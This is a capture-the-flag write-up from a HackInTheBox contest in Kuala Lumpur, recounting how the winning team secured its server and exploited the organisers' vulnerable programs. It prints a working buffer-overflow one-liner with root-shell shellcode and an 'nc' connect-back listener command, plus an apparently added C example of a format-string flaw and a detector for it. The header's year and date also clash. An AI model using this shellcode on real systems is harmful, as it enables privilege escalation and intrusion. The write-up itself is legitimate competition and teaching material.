Subject : CaptureTheFlag , HackInTheBox 2005
Date : 28 & 29 September 2004
Place : Westin Hotel , Kuala Lumpur
Organizer : http://www.hackinthebox.org
Em.. I wrote this in a rush, will do some editing later.
SpoonFork's Writeup : http://mel.icious.net/ctf_writeup.html
Final Result For CtF
1st: Panda (Malaysia) 5000 points - MY TEAM !!!!! OS: FreeBSD
2nd: Duo (Malaysia) 4710 points - two Chinese fellows, OS: Linux
3rd: VOOMPA (Malaysia) 4450 points - 3 cool dudes, OS: not too sure
Some other teams: two teams from SIG2, group CLS,
group CHININ, etc. Total of 9 teams.
By the way, something really cool for this year:
This year's prizes are sponsored by Defenxis Sdn. Bhd. The winners of this year's Capture The Flag will walk away with:
1st Place - Mac Mini 1.4GHz
2nd Place - iPod 20GB (5th generation)
3rd Place - iPod Shuffle (512MB)
Introduction :
The game attempts to test a security administrator's ability to secure a complex system with unknown but required functionality. While this task seems rather odd, this is similar to a day job as a security consultant: a customer has a large dot.com site, they did not know what it does (the IT staff have all left), and they want it to be secure. And don't turn it off, there is live traffic running on it. The HITBSecConf CtF game models this situation as follows: URL: http://conference.hackinthebox.org/hitbsecconf2005kl/index.php?cat=5
Day 1 :
Panda is our team name. Team members are myself, slash and x3142.
We chose FreeBSD. When we reached the place, we saw all Windows boxes.
We got a big shock, till we found out our OS was running on VMware.. em..
After we entered the game, we discovered a few funny things on the server:
1. Three unknown daemons running: daemon01, daemon02 and server01.
2. There are bug1, bug2, bug3 and bug4.
3. Some users with shells and wheel rights.
Suspicious... we started to remove the unknown users,
changed the root password and fixed the MySQL privileges.
Turned off Samba write rights, bla bla bla....
Looked secure enough. Since it is FreeBSD 5.4,
we assumed the system was strong enough, and we did not apply any firewall rules.
Oh ya, we did recompile the kernel.
In the /home directory there are a few funny folders. They are:
a. bug01 b. bug02 c. bug03 d. bug04 e. daemon01 f. daemon02 g. server01
All the programs are marked with comments from mel, so we guess they were written by mel.
We did not know we could code the exploit locally,
until Mel mentioned we could code the bug on our local server. Only then did we start to get busy.
x3142 and I were browsing all the code and discovered that bug02 is the simplest.
We worked on the bug separately. 10 min later I got a working exploit for bug2 on FreeBSD.
The code looks like:
(root@panda)[253] /home/bug02 # ./bug02 `ruby -e 'print "\x31\xc0\x50\xb0\x17\x50\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68" \
"\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80";print "\x90" * \
493;print "\x5c\xec\xbf\xbf"'` A A
#    <-- the shell
(The argument is 31 bytes of FreeBSD x86 shellcode, setuid(0) followed by execve("/bin//sh"), then 493 bytes of 0x90 padding to reach the saved return address, then the 4-byte return address 0xbfbfec5c written little-endian. The trailing "#" is the root prompt of the spawned shell.)
This is lazy man's code. We will write a better one during the weekend.
I guess we will be able to release the questions and the solutions ASAP.
Some time after finishing bug02, a bigger problem came... POWER FAILURE.
We had no choice and chose to take a break.
x3142 went out to source a power supply and I chose to go and get some food.
After the power came back, x3142 told me that he got bug04. He got it working on the notebook.
He changed the shellcode and the return address, and... it couldn't work on FreeBSD 5.4...
We told Mel we only got it working on Linux.
Mel said that that is enough for scoring. As long as we got the code running,
it's good enough. If we are able to get it running on other platforms, bonus points will be given.
We quickly went back to bug02 and coded it on Linux. After 30 min of trying on my Kubuntu,
I realised that the new Kubuntu (Breezy) comes with stack protection...
I needed to move to x3142's notebook and run the code on SUSE.
Again, it worked on Linux. We scored again.
End of day: our score is around 2500. The second place team (Duo) is about 2000.
Day 2.
Last night I found out there are a few problems with daemon01 and daemon02.
One of them is that we can show memory with %p.
Clearly there is a format string bug in both daemon01 and daemon02.
But for daemon01, the format string bug is not writable.
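As an added illustration of the %p leak described above (example code written for this write-up, not the source of the CTF daemons, which is not shown here): a handler that passes client text straight to snprintf() as the format string, its fixed form, and a small classifier that separates a read-only leak (%p, %x, %s) from a writable one (%n). The function names, the single pointer argument standing in for whatever sits in the next argument slot on a real target, and the sample inputs are all constructed for the example.

```c
#include <stdio.h>
#include <string.h>

/*
 * Constructed model of the daemon flaw: client text reaches snprintf()
 * as the format string. To keep the demonstration well-defined, one
 * pointer argument is supplied (a stand-in for whatever value happens to
 * occupy the next argument slot on a real target); a client that sends
 * "%p" gets that value echoed back, which is the memory leak seen in the CTF.
 */
int echo_vulnerable(const char *client_text, const void *leaked_slot,
                    char *out, size_t outlen)
{
    /* BUG: attacker-controlled format string. */
    return snprintf(out, outlen, client_text, leaked_slot);
}

/* Fixed handler: the format is a literal and client text is only data. */
int echo_fixed(const char *client_text, char *out, size_t outlen)
{
    return snprintf(out, outlen, "%s", client_text);
}

/*
 * Classify an untrusted string the way a quick triage would:
 *   0 - no conversion specifiers ("%%" is a literal percent, not a conversion)
 *   1 - read-only conversions such as %p, %x, %s (memory leak; daemon01's case)
 *   2 - a %n-family conversion, which writes to memory (the "writable" case)
 * Flags, width, precision, "$" positional access and length modifiers are
 * skipped so that "%08x", "%hn" and "%7$n" are classified correctly.
 */
int format_risk(const char *s)
{
    int risk = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')
            continue;               /* "%%" prints a literal '%' */
        if (*p == '\0')
            break;                  /* dangling '%' at end of string */
        while (*p && strchr("-+ #0123456789.$*hlLqjzt", *p))
            p++;                    /* skip everything up to the conversion char */
        if (*p == '\0')
            break;
        if (*p == 'n')
            return 2;               /* %n, %hn, %hhn, %7$n ... */
        risk = 1;
    }
    return risk;
}
```

Sending "%p" to echo_vulnerable() yields a printed pointer where echo_fixed() returns the literal text "%p"; format_risk() is what a daemon (or a scorer checking whether a given format string bug is writable) would run on the input before deciding how to treat it.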
We were trying our best to get bug03 working.
But during the second half of the day,
we managed to get some tips from another team (one of the SIG2 teams)
on bug03. Bug03 is a pointer bug. It is not simple to get the return address.
After that, we gave SIG2 a shell on our FreeBSD server and we got a shell from them too.
But during that time, both of us got a really bad DoS attack. It was not a network flood.
The organizer told us this cannot be considered a massive DoS attack.
Our server couldn't handle the DoS attack properly.
We got rebooted too many times,
until once Duo managed to take over our leading position by 100 points.
Then something funny happened:
our FreeBSD got hit till VMware couldn't take it. Then our Windows server rebooted automatically.
Funny problem... no one knows what happened.
x3142 found a way to log in to the CHININ box and gain root access.
He went in with slash and planted our flag there.
From there we gained some points and managed to gain more.
Now we are leading by 100 points.
Until the last few hours, we had no choice but to release our findings on bug03,
daemon01 and daemon02. That helped us gain a lot of points. At the same time
we got back our leading position.
During that time, we had 600 more points compared to the second group.
But our server still got heavily attacked. We needed to keep our server running.
We tried our best to maintain the server. Before the game ended,
we restarted our server more than 10 times.
During the last 15 mins, there was a power FAILURE... again..
Everyone took it as the end of the game. After 15 min of waiting,
we got the power back. Mel announced that the game would run for another 10 min. :)
At the same time Mel released some information for server01:
the connect-back port. During that time we just shut down our server01 and tried to
connect to other servers. Before the game ended,
I believe no one managed to do the "nc -vvlp 399X9".
Finally the bell rang... and... WE WON THE GAME.
Our final score is 5000 points. Officially :)